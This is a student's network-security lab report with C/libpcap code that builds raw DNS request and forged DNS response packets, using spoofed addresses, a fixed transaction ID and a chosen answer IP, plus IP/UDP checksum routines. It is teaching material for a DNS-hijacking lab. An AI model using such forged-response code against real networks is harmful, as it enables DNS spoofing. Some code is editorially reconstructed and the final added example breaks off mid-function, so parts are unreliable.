INTERNATIONAL UNIVERSITY
School of Computer Science and Engineering
LAB 2: DNS attack (Part 1 + 2)
Course: Network Security
Lecturer: Pham Van Hau, PhD
Date: 24/09/2013
Duration: 180 minutes
Student name: DO NHU TAI
Student ID: IT"#$#%&
Introduction
To do the DNS hijacking attack, you need to know how to generate and capture packets programmatically, and to understand the UDP and DNS packet headers as well as the DNS protocol. The purpose of this lab is to give you hands-on experience in low-level network programming. More precisely, you are going to create the DNS request and response. These will help you a lot for the next lab.

In general, to generate a raw packet you can use the pcap library (http://www.tcpdump.org/pcap.html), the Libnet library (http://packetfactory.openwall.net/projects/libnet/dist/deprecated/manual/lrm.html) or even the standard API (http://en.wikipedia.org/wiki/Berkeley_sockets). In the context of this lab, we use the pcap library for our purpose. Several useful pieces of information can be found at http://www.tcpdump.org/pcap.html.

To get an idea of what a DNS packet looks like, on your Linux machine:
• open Wireshark to capture the traffic
• open a terminal and execute "nslookup vnexpress.net"
Try to look at the different fields of the captured DNS packet and understand what they are used for. This link, http://www.networksorcery.com/enp/protocol/dns.htm, is also a great source for this purpose.
Part I: DNS packet generation
To help you with the programming, I have created two programs, called dns_request_gen.c and dns_response_gen.c. The programs I sent to you are not complete. You need to modify them at several places (marked "TO BE MODIFIED").

I. DNS packet request
Modify dns_request_gen.c to generate a DNS request that has:
• source MAC: A1 A2 A3 A4 A5 A6
• destination MAC: B1 B2 B3 B4 B5 B6
• source port: 4000
• destination port: 53
• Transaction ID: AABB
• source IP address: 1.2.3.4
• destination IP address: 6.7.8.9
• a DNS query asking for the IP address of "vnexpress.net"

Answer: Dntai_dns_request_v1.c (without IP and UDP checksums)
#include <stdio.h>        // printf (missing from the report's include list)
#include <string.h>       // strlen, memcpy, memset
#include <stdlib.h>       // malloc, exit
#include <sys/socket.h>   // you know what this is for
#include <arpa/inet.h>    // inet_addr, inet_ntoa, ntohs etc
#include <netinet/in.h>
#include <unistd.h>       // getpid
#include <pcap.h>

/* Ethernet headers are always exactly 14 bytes */
#define SIZE_ETH 14
/* Ethernet addresses are 6 bytes */
#define ETHER_ADDR_LEN 6
/* UDP PROTOCOL */
#define UDP_PROL 17

/* Ethernet header. The struct body is not legible in the report; the field names
   follow the tcpdump sniffex layout that the rest of the lab code uses. */
struct ethernet_header {
    u_char  ether_dhost[ETHER_ADDR_LEN];  /* destination host address */
    u_char  ether_shost[ETHER_ADDR_LEN];  /* source host address */
    u_short ether_type;                   /* IP? ARP? RARP? etc */
};

/* IP header */
struct ip_header {
    u_char  ip_vhl;                 /* version << 4 | header length >> 2 */
    u_char  ip_tos;                 /* type of service */
    u_short ip_len;                 /* total length */
    u_short ip_id;                  /* identification */
    u_short ip_off;                 /* fragment offset field */
#define IP_RF 0x8000                /* reserved fragment flag */
#define IP_DF 0x4000                /* dont fragment flag */
#define IP_MF 0x2000                /* more fragments flag */
#define IP_OFFMASK 0x1fff           /* mask for fragmenting bits */
    u_char  ip_ttl;                 /* time to live */
    u_char  ip_p;                   /* protocol */
    u_short ip_sum;                 /* checksum */
    struct in_addr ip_src, ip_dst;  /* source and dest address */
};
#define IP_HL(ip) (((ip)->ip_vhl) & 0x0f)
#define IP_V(ip)  (((ip)->ip_vhl) >> 4)

/* UDP header */
struct udp_header {
    u_short udp_sport;              /* source port */
    u_short udp_dport;              /* destination port */
    u_short udp_len;                /* udp length */
    u_short udp_sum;                /* udp checksum */
};

/* DNS header */
struct dns_header {
    u_short id;                     /* transaction ID */
    u_short flags;                  /* flags */
    u_short q_count;                /* number of question entries */
    u_short ans_count;              /* number of answer entries */
    u_short auth_count;             /* number of authority entries */
    u_short add_count;              /* number of resource entries */
};

/* question fields that follow the query name */
struct dns_query {
    u_short q_type;                 /* type of the host */
    u_short q_class;                /* class */
};

/* functions */
void print_app_info(void){
    printf("Dns request version 1 writen by Do Nhu Tai\n");
}

/* Convert "vnexpress.net" into the DNS label format "\x09vnexpress\x03net\x00".
   Fix: the terminating zero belongs at dns[len+1]; the report wrote dns[len+2],
   which only worked because the packet buffer had been zeroed beforehand. */
void DNS_name_converter(char *host, char *dns);
void DNS_name_converter(char *host, char *dns)
{
    int len = strlen(host);
    dns[len+1] = 0;
    int count = 0;                  // For counting the number of characters from the end until a 'dot' is met
    while(len>0){                   // While the host name length is larger than zero
        if(host[len-1]=='.')        // Count from the last character of the host name; if there is a 'dot'
        {
            dns[len] = count;       // Store the counted number into the dns name buffer
            count = 0;              // Set count to zero to recount
        }else{
            dns[len] = host[len-1]; // If the character is not a 'dot' store it into the dns name buffer
            count++;                // Increase count
        }
        len--;                      // Decrease len
    }
    dns[0] = count;                 // When the first character is reached, store the final counter into the dns name buffer
}

int main(int argc, char *argv[])
{
    char errb[PCAP_ERRBUF_SIZE];
    pcap_t *descr;                  // session description
    bpf_u_int32 net;                // ip of device
    bpf_u_int32 mask;               // subnet mask
    int i, result, size_ip;
    char *host;                     // host name to look up ip. Ex: vnexpress.net
    char *dev;                      // network device to capture. Ex: eth0
    u_char packet[5000];            // packet is the buffer that contains the data

    print_app_info();
    if(argc!=3){
        printf("Usage: %s <Network Device's Name> <Hostname ex:www.vnexpress.net> \n", argv[0]);
        exit(1);
    }else{
        dev  = argv[1];
        host = argv[2];
    }
    // check for a suitable network device and store the ip, subnet mask for future use
    if(pcap_lookupnet(dev, &net, &mask, errb) == -1){
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
    if (descr == NULL){
        printf("Set description failed: %s\n", errb);
        exit(1);
    }
    // zero out the packet ([Ethernet] + [IP] + [TCP/UDP] + [Application])
    memset(packet, 0, sizeof(packet)); // packet is the array that holds the data to send

    /* ===================== Build a [DNS REQUEST] packet =====================
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header       *ip;     // pointer to the start of the ip header
    struct udp_header      *udp;    // pointer to the start of the udp header
    struct dns_header      *dns;    // pointer to the start of the dns header
    u_char *q_name;                 // pointer to the start of the query_name
    int host_len = strlen(host);    // (vnexpress.net has len=13) the query name length is the number of characters of the host name
    struct dns_query *dns_qr;       // pointer to the start of the dns query
    int size_q_name = host_len+2;   // size of the query name: host name plus length byte and terminating zero (2)

    /* The pointer set-up and the Ethernet/IP header lines are not legible in the report's
       listing; they are reconstructed here from the lab specification and the comments
       that survive ("IP version 4 | length = 5 words", "UDP protocol", ...). */
    eth    = (struct ethernet_header *)packet;
    ip     = (struct ip_header *)(packet + SIZE_ETH);
    udp    = (struct udp_header *)((u_char *)ip + sizeof(struct ip_header));
    dns    = (struct dns_header *)((u_char *)udp + sizeof(struct udp_header));
    q_name = (u_char *)dns + sizeof(struct dns_header);
    dns_qr = (struct dns_query *)(q_name + size_q_name);

    /* Ethernet Header */
    u_char src_mac[ETHER_ADDR_LEN] = {0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6}; // source MAC from the lab spec
    u_char dst_mac[ETHER_ADDR_LEN] = {0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6}; // destination MAC from the lab spec
    memcpy(eth->ether_shost, src_mac, ETHER_ADDR_LEN);
    memcpy(eth->ether_dhost, dst_mac, ETHER_ADDR_LEN);
    eth->ether_type = htons(0x0800);                // IPv4

    /* IP Header */
    ip->ip_vhl = 0x45;                              // IP version 4 | length = 5 words (20 bytes)
    ip->ip_tos = 0;                                 // Differentiated Services Field
    ip->ip_id  = htons(0);                          // Identification (value not legible in the report)
    ip->ip_off = 0;
    ip->ip_ttl = 64;                                // time to live (value not legible in the report)
    ip->ip_p   = UDP_PROL;                          // UDP protocol
    ip->ip_sum = 0;                                 // ip checksum (??) left at zero in version 1
    (ip->ip_src).s_addr = inet_addr("1.2.3.4");     // source ip address
    /****************************TO BE MODIFIED 5 ***************************/
    (ip->ip_dst).s_addr = inet_addr("6.7.8.9");     // destination ip address

    /* UDP Header */
    udp->udp_sport = htons(4000);                   // source port
    /****************************TO BE MODIFIED 6 ***************************/
    udp->udp_dport = htons(53);                     // destination port
    udp->udp_sum   = 0;                             // udp checksum (??)

    /* DNS Header */
    dns->id         = htons(0xAABB);                // transaction ID
    dns->flags      = htons(0x0100);                // flags (standard query)
    dns->q_count    = htons(0x001);                 // number of question
    dns->ans_count  = 0;                            // number of answer
    dns->auth_count = 0;                            // number of authority
    dns->add_count  = 0;                            // number of resource

    /* DNS Query: query_name, dns query header */
    // Convert hostname to dns format and store it in the memory q_name points to
    DNS_name_converter(host, (char *)q_name);
    dns_qr->q_type  = htons(1);                     // type of the host
    dns_qr->q_class = htons(1);                     // class

    /* Update Length of Ip Header and Udp Header */
    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));
    // total length: add in host order and convert once (the report added two htons() values,
    // which only yields the right bytes while the total stays below 256)
    ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));
    size_ip = IP_HL(ip)*4;                          // header length in bytes, used by the checksum in version 2
    (void)size_ip;

    /* send packet 6 times */
    for (i=0; i <= 5; i++) {
        result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
        if(result == 0) printf("[Packet sent sucessfully]\n");
        else            printf("[Packet sent failure]\n");
    }
    pcap_close(descr);
    return 0;
}
Result with packet capture (screenshots not reproduced here):
- Received 6 DNS request packets
- Ethernet header
- IP header (with checksum error)
- UDP header
- DNS query
II. DNS packet response
Modify dns_response_gen.c to generate a DNS response that has:
• source MAC: B1 B2 B3 B4 B5 B6
• destination MAC: A1 A2 A3 A4 A5 A6
• source port: 53
• destination port: 4000
• Transaction ID: AABB
• source IP address: 6.7.8.9
• destination IP address: 1.2.3.4
• DNS response: the IP address of "vnexpress.net" is "111.65.248.132"

Answer: Dntai_dns_response_v1.c (without IP and UDP checksums)
/* The includes, SIZE_ETH / ETHER_ADDR_LEN / UDP_PROL, the ethernet_header, ip_header,
   udp_header, dns_header and dns_query structs, print_app_info() and DNS_name_converter()
   are identical to Dntai_dns_request_v1.c above and are not repeated here. */

/* Answer record: name pointer, type, class, ttl, rdlength, IPv4 address. This is 16 bytes
   on the wire, so the struct must be packed. The definition is not legible in the report
   and is reconstructed from the fields the code below uses (a_name, a_addr). */
struct dns_answer {
    u_char  a_name[2];              /* pointer to the question name (0xC00C) */
    u_short a_type;                 /* record type */
    u_short a_class;                /* record class */
    u_int   a_ttl;                  /* time to live */
    u_short a_len;                  /* rdata length */
    struct in_addr a_addr;          /* IPv4 address */
} __attribute__((packed));

int main(int argc, char *argv[])
{
    u_char packet[5000];
    char *dev;                      // network device
    char errb[PCAP_ERRBUF_SIZE];
    pcap_t *descr;                  // session description
    bpf_u_int32 net;                // ip of device
    bpf_u_int32 mask;               // subnet mask
    int i, result, size_ip;
    char *host;

    print_app_info();
    if(argc!=3){
        printf("Usage: %s <Network Device's Name> <Hostname ex:www.vnexpress.net> \n", argv[0]);
        exit(1);
    }else{
        dev  = argv[1];
        host = argv[2];
    }
    // check for a suitable network device and store the ip, subnet mask for future use
    if(pcap_lookupnet(dev, &net, &mask, errb) == -1){
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
    if (descr == NULL){
        printf("Set description failed: %s\n", errb);
        exit(1);
    }
    // zero out the packet
    memset(packet, 0, sizeof(packet));

    /* ===================== Build a [DNS RESPONSE] packet =====================
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query + Dns Answer */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header       *ip;     // pointer to the start of the ip header
    struct udp_header      *udp;    // pointer to the start of the udp header
    struct dns_header      *dns;    // pointer to the start of the dns header
    struct dns_query       *dns_qr; // pointer to the start of the dns query
    struct dns_answer      *dns_as; // pointer to the start of the dns answer
    u_char *q_name;                 // Dns name in query
    int host_len = strlen(host);    // Hostname length
    int size_q_name = host_len+2;   // size of the query name: host name plus length byte and terminating zero (2)

    /* Pointer set-up and Ethernet/IP header lines: not legible in the report, reconstructed
       from the lab specification (same layout as the request, addresses swapped). */
    eth    = (struct ethernet_header *)packet;
    ip     = (struct ip_header *)(packet + SIZE_ETH);
    udp    = (struct udp_header *)((u_char *)ip + sizeof(struct ip_header));
    dns    = (struct dns_header *)((u_char *)udp + sizeof(struct udp_header));
    q_name = (u_char *)dns + sizeof(struct dns_header);
    dns_qr = (struct dns_query *)(q_name + size_q_name);
    dns_as = (struct dns_answer *)((u_char *)dns_qr + sizeof(struct dns_query));

    /* Ethernet Header */
    u_char src_mac[ETHER_ADDR_LEN] = {0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6}; // source MAC from the lab spec
    u_char dst_mac[ETHER_ADDR_LEN] = {0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6}; // destination MAC from the lab spec
    memcpy(eth->ether_shost, src_mac, ETHER_ADDR_LEN);
    memcpy(eth->ether_dhost, dst_mac, ETHER_ADDR_LEN);
    eth->ether_type = htons(0x0800);                // IPv4

    /* IP Header */
    ip->ip_vhl = 0x45;                              // IP version 4 | length = 5 words (20 bytes)
    ip->ip_tos = 0;                                 // Differentiated Services Field
    ip->ip_id  = htons(0);                          // Identification (value not legible in the report)
    ip->ip_off = 0;
    ip->ip_ttl = 64;                                // time to live (value not legible in the report)
    ip->ip_p   = UDP_PROL;                          // UDP protocol
    ip->ip_sum = 0;                                 // ip checksum (??) left at zero in version 1
    (ip->ip_src).s_addr = inet_addr("6.7.8.9");     // source ip address
    /****************************TO BE MODIFIED 5 ***************************/
    (ip->ip_dst).s_addr = inet_addr("1.2.3.4");     // destination ip address

    /* UDP Header */
    udp->udp_sport = htons(53);                     // source port
    /****************************TO BE MODIFIED 6 ***************************/
    udp->udp_dport = htons(4000);                   // destination port
    udp->udp_sum   = 0;                             // udp checksum (??)

    /* DNS Header */
    dns->id         = htons(0xAABB);                // transaction ID
    dns->flags      = htons(0x8180);                // flags (standard response, no error)
    dns->q_count    = htons(0x001);                 // number of question
    dns->ans_count  = htons(0x001);                 // number of answer
    dns->auth_count = 0;                            // number of authority
    dns->add_count  = 0;                            // number of resource

    /* DNS Query: query_name, dns query header, dns answer */
    // Convert hostname to dns format and store it in the memory q_name points to
    DNS_name_converter(host, (char *)q_name);
    dns_qr->q_type  = htons(1);                     // type of the host
    dns_qr->q_class = htons(1);                     // class

    /* DNS Answer */
    memcpy(&dns_as->a_name, "\xc0\x0c", 2);         // compression pointer to the question name at offset 12
    // type/class/ttl/length are not legible in the report's listing; an A record needs them
    dns_as->a_type  = htons(1);                     // A
    dns_as->a_class = htons(1);                     // IN
    dns_as->a_ttl   = htonl(3600);                  // ttl (assumed value)
    dns_as->a_len   = htons(4);                     // IPv4 address length
    /****************************TO BE MODIFIED 7 ***************************/
    dns_as->a_addr.s_addr = inet_addr("111.65.248.132");

    /* Update Length of Ip Header and Udp Header */
    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name
                         + sizeof(struct dns_query) + sizeof(struct dns_answer));
    ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));  // total length, summed in host order
    size_ip = IP_HL(ip)*4;
    (void)size_ip;

    /* send packet 6 times */
    for (i=0; i <= 5; i++) {
        result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
        if(result == 0) printf("[Packet sent sucessfully]\n");
        else            printf("[Packet sent failure]\n");
    }
    pcap_close(descr);
    return 0;
}
Result with packet capture (screenshot not reproduced here):
- Received 6 DNS response packets

III. DNS packet response
The checksums (of the IP and UDP headers) of the generated packets are wrong. Do what is necessary to make them right.

Answer: Dntai_dns_request_v2.c (with IP and UDP checksums)
/* The includes, #defines, the ethernet_header, ip_header, udp_header, dns_header and
   dns_query structs, print_app_info() and DNS_name_converter() are identical to
   Dntai_dns_request_v1.c above and are not repeated here. */

/* ------------ FUNCTIONS THAT CREATE THE CHECKSUM OF UDP, IP ---------------- */
unsigned short csum(unsigned short *buf, int nwords);
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[]);

/* IP header checksum. Despite its name, nwords is a byte count (the caller passes
   size_ip = 20); the loop walks nwords/2 16-bit words. Words are summed in network
   byte order and the result stored as-is, which is byte-order independent. */
unsigned short csum(unsigned short *buf, int nwords)
{
    unsigned long sum = 0;
    int i;
    for (i=0; i<(nwords/2); i++) sum += buf[i];
    sum  = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return ~sum;
}

/* UDP checksum over the pseudo header (source ip, destination ip, protocol, length)
   and the UDP header + data. Sums in host order; the caller applies htons(). */
unsigned short udp_csum(unsigned short len, unsigned short ip_src[], unsigned short ip_dst[], unsigned short buff[])
{
    unsigned short udp_protocol = UDP_PROL;
    unsigned short padding = 0;
    unsigned long sum;
    int i;
    // Find out if the data length is even or odd. If odd, add a padding byte = 0 at the end of the packet.
    // Fix: the padding byte is byte 'len', not 16-bit word 'len' as the report wrote (buff[len]=0).
    if (len%2 != 0){
        padding = 1;
        ((unsigned char *)buff)[len] = 0;
    }
    // Initialize sum to zero
    sum = 0;
    // Sum all the buffer in 16 bit words
    for(i=0; i<(len+padding)/2; i++) sum += ntohs((unsigned short) buff[i]);
    // Sum the pseudo header which contains source ip, destination ip, protocol number and length
    for(i=0; i<2; i++) sum += ntohs((unsigned short) ip_src[i]);
    for(i=0; i<2; i++) sum += ntohs((unsigned short) ip_dst[i]);
    sum += (unsigned short)udp_protocol + (unsigned short)len;
    while (sum>>16) sum = (sum & 0xFFFF) + (sum >> 16);
    return ~sum;
}

int main(int argc, char *argv[])
{
    char errb[PCAP_ERRBUF_SIZE];
    pcap_t *descr;                  // session description
    bpf_u_int32 net;                // ip of device
    bpf_u_int32 mask;               // subnet mask
    int i, result, size_ip;
    char *host;                     // host name to look up ip. Ex: vnexpress.net
    char *dev;                      // network device to capture. Ex: eth0
    u_char packet[5000];            // packet is the buffer that contains the data

    print_app_info();
    if(argc!=3){
        printf("Usage: %s <Network Device's Name> <Hostname ex:www.vnexpress.net> \n", argv[0]);
        exit(1);
    }else{
        dev  = argv[1];
        host = argv[2];
    }
    // check for a suitable network device and store the ip, subnet mask for future use
    if(pcap_lookupnet(dev, &net, &mask, errb) == -1){
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
    if (descr == NULL){
        printf("Set description failed: %s\n", errb);
        exit(1);
    }
    // zero out the packet ([Ethernet] + [IP] + [TCP/UDP] + [Application])
    memset(packet, 0, sizeof(packet)); // packet is the array that holds the data to send

    /* ===================== Build a [DNS REQUEST] packet =====================
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header       *ip;     // pointer to the start of the ip header
    struct udp_header      *udp;    // pointer to the start of the udp header
    struct dns_header      *dns;    // pointer to the start of the dns header
    u_char *q_name;                 // pointer to the start of the query_name
    int host_len = strlen(host);    // (vnexpress.net has len=13) the query name length is the number of characters of the host name
    struct dns_query *dns_qr;       // pointer to the start of the dns query
    int size_q_name = host_len+2;   // size of the query name: host name plus length byte and terminating zero (2)

    /* The rest of main() is not legible in the report's listing of dns_request_v2.c. It is
       the body of Dntai_dns_request_v1.c above, followed by the checksum update that the
       dns_response_v2.c listing below shows; both are reproduced here so the file builds. */
    eth    = (struct ethernet_header *)packet;
    ip     = (struct ip_header *)(packet + SIZE_ETH);
    udp    = (struct udp_header *)((u_char *)ip + sizeof(struct ip_header));
    dns    = (struct dns_header *)((u_char *)udp + sizeof(struct udp_header));
    q_name = (u_char *)dns + sizeof(struct dns_header);
    dns_qr = (struct dns_query *)(q_name + size_q_name);

    u_char src_mac[ETHER_ADDR_LEN] = {0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6};
    u_char dst_mac[ETHER_ADDR_LEN] = {0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6};
    memcpy(eth->ether_shost, src_mac, ETHER_ADDR_LEN);
    memcpy(eth->ether_dhost, dst_mac, ETHER_ADDR_LEN);
    eth->ether_type = htons(0x0800);

    ip->ip_vhl = 0x45;  ip->ip_tos = 0;  ip->ip_id = htons(0);  ip->ip_off = 0;
    ip->ip_ttl = 64;    ip->ip_p = UDP_PROL;
    (ip->ip_src).s_addr = inet_addr("1.2.3.4");
    (ip->ip_dst).s_addr = inet_addr("6.7.8.9");

    udp->udp_sport = htons(4000);
    udp->udp_dport = htons(53);

    dns->id = htons(0xAABB);  dns->flags = htons(0x0100);  dns->q_count = htons(0x001);
    dns->ans_count = 0;  dns->auth_count = 0;  dns->add_count = 0;

    DNS_name_converter(host, (char *)q_name);
    dns_qr->q_type  = htons(1);
    dns_qr->q_class = htons(1);

    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name + sizeof(struct dns_query));
    ip->ip_len   = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));
    size_ip      = IP_HL(ip)*4;

    /* UPDATE CHECKSUM OF IP HEADER AND UDP HEADER */
    ip->ip_sum   = 0;
    ip->ip_sum   = csum((unsigned short *)(packet + SIZE_ETH), size_ip);
    udp->udp_sum = 0;
    udp->udp_sum = htons(udp_csum(ntohs(udp->udp_len), (u_short *)&(ip->ip_src),
                                  (u_short *)&(ip->ip_dst), (unsigned short *)udp));

    /* send packet 6 times */
    for (i=0; i <= 5; i++) {
        result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
        if(result == 0) printf("[Packet sent sucessfully]\n");
        else            printf("[Packet sent failure]\n");
    }
    pcap_close(descr);
    return 0;
}
Dntai_dns_response_v2.c (with IP and UDP checksums)

/* The includes, #defines, header structs, struct dns_query, struct dns_answer (see
   Dntai_dns_response_v1.c), print_app_info(), DNS_name_converter(), csum() and udp_csum()
   (see Dntai_dns_request_v2.c) are the same as above and are not repeated here. */

int main(int argc, char *argv[])
{
    u_char packet[5000];
    char *dev;                      // network device
    char errb[PCAP_ERRBUF_SIZE];
    pcap_t *descr;                  // session description
    bpf_u_int32 net;                // ip of device
    bpf_u_int32 mask;               // subnet mask
    int i, result, size_ip;
    char *host;

    print_app_info();
    if(argc!=3){
        printf("Usage: %s <Network Device's Name> <Hostname ex:www.vnexpress.net> \n", argv[0]);
        exit(1);
    }else{
        dev  = argv[1];
        host = argv[2];
    }
    // check for a suitable network device and store the ip, subnet mask for future use
    if(pcap_lookupnet(dev, &net, &mask, errb) == -1){
        printf("Error: %s\n", errb);
        exit(1);
    }
    // set the pcap description
    descr = pcap_open_live(dev, BUFSIZ, 1, 0, errb);
    if (descr == NULL){
        printf("Set description failed: %s\n", errb);
        exit(1);
    }
    // zero out the packet
    memset(packet, 0, sizeof(packet));

    /* ===================== Build a [DNS RESPONSE] packet =====================
       Ethernet Header + IP Header + UDP Header + DNS Header + Query Name + Dns Query + Dns Answer */
    struct ethernet_header *eth;    // pointer to the start of the ethernet header
    struct ip_header       *ip;     // pointer to the start of the ip header
    struct udp_header      *udp;    // pointer to the start of the udp header
    struct dns_header      *dns;    // pointer to the start of the dns header
    struct dns_query       *dns_qr; // pointer to the start of the dns query
    struct dns_answer      *dns_as; // pointer to the start of the dns answer
    u_char *q_name;                 // Dns name in query
    int host_len = strlen(host);    // Hostname length
    int size_q_name = host_len+2;   // size of the query name: host name plus length byte and terminating zero (2)

    /* Pointer set-up and Ethernet/IP header lines: not legible in the report, reconstructed
       from the lab specification. */
    eth    = (struct ethernet_header *)packet;
    ip     = (struct ip_header *)(packet + SIZE_ETH);
    udp    = (struct udp_header *)((u_char *)ip + sizeof(struct ip_header));
    dns    = (struct dns_header *)((u_char *)udp + sizeof(struct udp_header));
    q_name = (u_char *)dns + sizeof(struct dns_header);
    dns_qr = (struct dns_query *)(q_name + size_q_name);
    dns_as = (struct dns_answer *)((u_char *)dns_qr + sizeof(struct dns_query));

    u_char src_mac[ETHER_ADDR_LEN] = {0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6};
    u_char dst_mac[ETHER_ADDR_LEN] = {0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6};
    memcpy(eth->ether_shost, src_mac, ETHER_ADDR_LEN);
    memcpy(eth->ether_dhost, dst_mac, ETHER_ADDR_LEN);
    eth->ether_type = htons(0x0800);

    /* IP Header */
    ip->ip_vhl = 0x45;                              // IP version 4 | length = 5 words (20 bytes)
    ip->ip_tos = 0;                                 // Differentiated Services Field
    ip->ip_id  = htons(0);                          // Identification (value not legible in the report)
    ip->ip_off = 0;
    ip->ip_ttl = 64;                                // time to live (value not legible in the report)
    ip->ip_p   = UDP_PROL;                          // UDP protocol
    (ip->ip_src).s_addr = inet_addr("6.7.8.9");     // source ip address
    /****************************TO BE MODIFIED 5 ***************************/
    (ip->ip_dst).s_addr = inet_addr("1.2.3.4");     // destination ip address

    /* UDP Header */
    udp->udp_sport = htons(53);                     // source port
    /****************************TO BE MODIFIED 6 ***************************/
    udp->udp_dport = htons(4000);                   // destination port
    udp->udp_sum   = 0;                             // udp checksum, filled in below

    /* DNS Header */
    dns->id         = htons(0xAABB);                // transaction ID
    dns->flags      = htons(0x8180);                // flags (standard response, no error)
    dns->q_count    = htons(0x001);                 // number of question
    dns->ans_count  = htons(0x001);                 // number of answer
    dns->auth_count = 0;                            // number of authority
    dns->add_count  = 0;                            // number of resource

    /* DNS Query: query_name, dns query header, dns answer */
    // Convert hostname to dns format and store it in the memory q_name points to
    DNS_name_converter(host, (char *)q_name);
    dns_qr->q_type  = htons(1);                     // type of the host
    dns_qr->q_class = htons(1);                     // class

    /* DNS Answer */
    memcpy(&dns_as->a_name, "\xc0\x0c", 2);         // compression pointer to the question name at offset 12
    dns_as->a_type  = htons(1);                     // A   (not legible in the report; needed for a well-formed record)
    dns_as->a_class = htons(1);                     // IN
    dns_as->a_ttl   = htonl(3600);                  // ttl (assumed value)
    dns_as->a_len   = htons(4);                     // IPv4 address length
    /****************************TO BE MODIFIED 7 ***************************/
    dns_as->a_addr.s_addr = inet_addr("111.65.248.132");

    /* Update Length of Ip Header and Udp Header */
    udp->udp_len = htons(sizeof(struct udp_header) + sizeof(struct dns_header) + size_q_name
                         + sizeof(struct dns_query) + sizeof(struct dns_answer));
    ip->ip_len = htons(sizeof(struct ip_header) + ntohs(udp->udp_len));  // total length, summed in host order
    size_ip = IP_HL(ip)*4;

    /* UPDATE CHECKSUM OF IP HEADER AND UDP HEADER */
    ip->ip_sum   = 0;
    ip->ip_sum   = csum((unsigned short *)(packet + SIZE_ETH), size_ip);
    udp->udp_sum = 0;
    udp->udp_sum = htons(udp_csum(ntohs(udp->udp_len), (u_short *)&(ip->ip_src),
                                  (u_short *)&(ip->ip_dst), (unsigned short *)udp));

    /* send packet 6 times */
    for (i=0; i <= 5; i++) {
        result = pcap_sendpacket(descr, packet, SIZE_ETH + ntohs(ip->ip_len));
        if(result == 0) printf("[Packet sent sucessfully]\n");
        else            printf("[Packet sent failure]\n");
    }
    pcap_close(descr);
    return 0;
}
Result with packet capture (screenshot not reproduced here):
- Received 6 DNS response packets, with valid IP and UDP checksums
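As an added example (not the report's code), here are the two checksums of Part III written so that they can be verified as well as generated: the IP header checksum, and the UDP checksum over the RFC 768 pseudo-header. Unlike the report's udp_csum, an odd trailing byte is padded in the arithmetic rather than by writing into the buffer, and the sample request packet, the IP header used as a known-answer test, and the 192.0.2.x-free addresses are all constructed here, not captured.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define IPPROTO_UDP_NUM 17   /* protocol number carried in the pseudo-header */

/* One's-complement sum of a byte buffer taken as big-endian 16-bit words, added to
 * 'sum'. A trailing odd byte is padded with zero in the arithmetic, so nothing is
 * ever written past the buffer (the report's udp_csum wrote buff[len] instead). */
static uint32_t ones_sum(const uint8_t *p, size_t len, uint32_t sum)
{
    while (len > 1) { sum += ((uint32_t)p[0] << 8) | p[1]; p += 2; len -= 2; }
    if (len) sum += (uint32_t)p[0] << 8;
    return sum;
}

/* Fold the carries back in until the sum fits in 16 bits. */
static uint16_t fold(uint32_t sum)
{
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)sum;
}

/* IPv4 header checksum: complement of the sum over the header with the checksum
 * field (bytes 10-11) taken as zero. Returned in host order; store it with htons(). */
uint16_t ip_checksum(const uint8_t *hdr, size_t hlen)
{
    uint32_t s = ones_sum(hdr, 10, 0);
    s = ones_sum(hdr + 12, hlen - 12, s);
    return (uint16_t)~fold(s);
}

/* UDP checksum (RFC 768): pseudo-header (source IP, destination IP, zero, protocol 17,
 * UDP length), then the UDP header and payload with the checksum field taken as zero.
 * A result of 0 is sent as 0xffff because 0 on the wire means "no checksum". */
uint16_t udp_checksum(const uint8_t src[4], const uint8_t dst[4], const uint8_t *udp, size_t ulen)
{
    uint32_t s = ones_sum(src, 4, 0);
    s = ones_sum(dst, 4, s);
    s += IPPROTO_UDP_NUM + (uint32_t)ulen;
    s = ones_sum(udp, 6, s);                   /* ports and length */
    s = ones_sum(udp + 8, ulen - 8, s);        /* payload; checksum bytes 6-7 skipped */
    uint16_t c = (uint16_t)~fold(s);
    return c ? c : 0xffff;
}

/* Receiver-side check: summing everything including the stored checksum must give
 * 0xffff. A stored checksum of 0 is reported invalid here, although IPv4 permits it. */
int udp_checksum_valid(const uint8_t src[4], const uint8_t dst[4], const uint8_t *udp, size_t ulen)
{
    uint32_t s = ones_sum(src, 4, 0);
    s = ones_sum(dst, 4, s);
    s += IPPROTO_UDP_NUM + (uint32_t)ulen;
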